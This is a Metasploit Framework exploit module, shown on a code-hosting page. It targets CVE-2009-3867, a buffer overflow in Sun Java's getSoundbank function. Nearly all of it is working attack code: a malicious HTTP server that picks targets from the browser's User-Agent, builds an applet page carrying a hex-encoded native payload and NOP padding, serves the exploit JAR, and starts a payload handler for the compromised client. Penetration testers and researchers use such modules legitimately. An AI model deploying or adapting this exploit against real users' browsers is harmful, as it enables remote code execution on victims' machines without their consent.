CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_getsoundbank_bof.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'Sun Java JRE getSoundbank file:// URI Buffer Overflow',

17
      'Description'    => %q{

18
        This module exploits a flaw in the getSoundbank function in the Sun JVM.

19


20
        The payload is serialized and passed to the applet via PARAM tags. It must be

21
        a native payload.

22


23
        The effected Java versions are JDK and JRE 6 Update 16 and earlier,

24
        JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and

25
        earlier, and SDK and JRE 1.3.1_26 and earlier.

26


27
        NOTE: Although all of the above versions are reportedly vulnerable, only

28
        1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

29
      },

30
      'License'        => MSF_LICENSE,

31
      'Author'         =>

32
        [

33
          'kf',      # Original PoC/exploit

34
          'jduck'    # metasploit version

35
        ],

36
      'References'     =>

37
        [

38
          [ 'CVE', '2009-3867' ],

39
          [ 'OSVDB', '59711' ],

40
          [ 'BID', '36881' ],

41
          [ 'ZDI', '09-076' ]

42
        ],

43
      'Payload'        =>

44
        {

45
          'Space'    => 1024,

46
          'BadChars' => '',

47
          'DisableNops' => true,

48
        },

49
      'Platform'       => %w{ win osx },

50
      'Targets'        =>

51
        [

52
=begin

53


54
No automatic targetting for now ...

55


56
          [ 'J2SE 1.6_16 Automatic',

57
            {

58
              'Platform' => %w{ linux osx win },

59
              'Arch' => [ARCH_X86, ARCH_PPC]

60
            }

61
          ],

62
=end

63
          [ 'J2SE 1.6_16 on Windows x86',

64
            {

65
              'Platform' => 'win',

66
              'Arch' => ARCH_X86

67
            }

68
          ],

69
          [ 'J2SE 1.6_16 on Mac OS X PPC',

70
            {

71
              'Platform' => 'osx',

72
              'Arch' => ARCH_PPC,

73
            }

74
          ],

75
          [ 'J2SE 1.6_16 on Mac OS X x86',

76
            {

77
              'Platform' => 'osx',

78
              'Arch' => ARCH_X86,

79
            }

80
          ],

81
        ],

82
      'DefaultTarget'  => 0,

83
      'DisclosureDate' => '2009-11-04'

84
      ))

85
  end

86


87


88
  def exploit

89
    # load the static jar

90
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2009-3867.jar")

91
    fd = File.open(path, "rb")

92
    @jar_data = fd.read(fd.stat.size)

93
    fd.close

94


95
    super

96
  end

97


98


99
  def on_request_uri(cli, req)

100


101
    # Create a cached mapping between IP and detected target

102
    @targetcache ||= {}

103
    @targetcache[cli.peerhost] ||= {}

104
    @targetcache[cli.peerhost][:update] = Time.now.to_i

105


106
    if (target.name =~ /Automatic/)

107
      case req.headers['User-Agent']

108
      when /Windows/i

109
        print_status("Choosing a Windows target")

110
        @targetcache[cli.peerhost][:target] = self.targets[1]

111
      when /PPC Mac OS X/i

112
        print_status("Choosing a Mac OS X PPC target")

113
        @targetcache[cli.peerhost][:target] = self.targets[2]

114
      when /Intel Mac OS X/i

115
        print_status("Choosing a Mac OS X x86 target")

116
        @targetcache[cli.peerhost][:target] = self.targets[3]

117
      else

118
        print_status("Unknown target for: #{req.headers['User-Agent']}")

119
      end

120
    end

121


122
    # Clean the cache

123
    rmq = []

124
    @targetcache.each_key do |addr|

125
      if (Time.now.to_i > @targetcache[addr][:update]+60)

126
        rmq.push addr

127
      end

128
    end

129


130
    rmq.each {|addr| @targetcache.delete(addr) }

131


132


133
    # Request processing

134
    if (not req.uri.match(/\.jar$/i))

135


136
      # Redirect to the base directory so the applet code loads...

137
      if (not req.uri.match(/\/$/))

138
        print_status("Sending redirect so path ends with / ...")

139
        send_redirect(cli, get_resource() + '/', '')

140
        return

141
      end

142


143
      # Display the applet loading HTML

144
      print_status("Sending HTML")

145
      send_response_html(cli, generate_html(payload.encoded),

146
        {

147
          'Content-Type' => 'text/html',

148
          'Pragma' => 'no-cache'

149
        })

150
      return

151
    end

152


153
    # Send the actual applet over

154
    print_status("Sending applet")

155
    send_response(cli, generate_applet(cli, req),

156
      {

157
        'Content-Type' => 'application/octet-stream',

158
        'Pragma' => 'no-cache'

159
      })

160


161
    # Handle the payload

162
    handler(cli)

163
  end

164


165


166
  def generate_html(pl)

167


168
    html = <<-EOF

169
<html>

170
<head>

171
<!-- <meta http-equiv=refresh content=10 /> -->

172
</head>

173
<body>

174
<applet width='100%' height='100%' code='AppletX' archive='JARNAME'>

175
<param name='sc' value='SCODE' />

176
<param name='np' value='NOPS' />

177
</applet>

178
</body>

179
</html>

180
EOF

181


182
    # finalize the html

183
    jar_name = rand_text_alphanumeric(32) + '.jar'

184
    html.gsub!(/JARNAME/, jar_name)

185


186
    # add payload

187
    debug_payload = false

188
    pload = ""

189
    pload << "\xcc" if debug_payload

190
    pload << pl

191
    if ((pload.length % 4) > 0)

192
      pload << rand_text((4 - (pload.length % 4)))

193
    end

194
    if debug_payload

195
      print_status("pload #{pload.length} bytes:\n" + Rex::Text.to_hex_dump(pload))

196
    end

197
    html.gsub!(/SCODE/, Rex::Text.to_hex(pload, ''))

198


199
    # add nops

200
    nops = "\x90\x90\x90\x90"

201
    html.gsub!(/NOPS/, Rex::Text.to_hex(nops, ''))

202
    #print_status("nops #{nops.length} bytes:\n" + Rex::Text.to_hex_dump(nops))

203


204
    return html

205


206
  end

207


208


209
  def generate_applet(cli, req)

210


211
    this_target = nil

212
    if (target.name =~ /Automatic/)

213
      if (@targetcache[cli.peerhost][:target])

214
        this_target = @targetcache[cli.peerhost][:target]

215
      else

216
        return ''

217
      end

218
    else

219
      this_target = target

220
    end

221


222
    return @jar_data

223
  end

224
end

225


226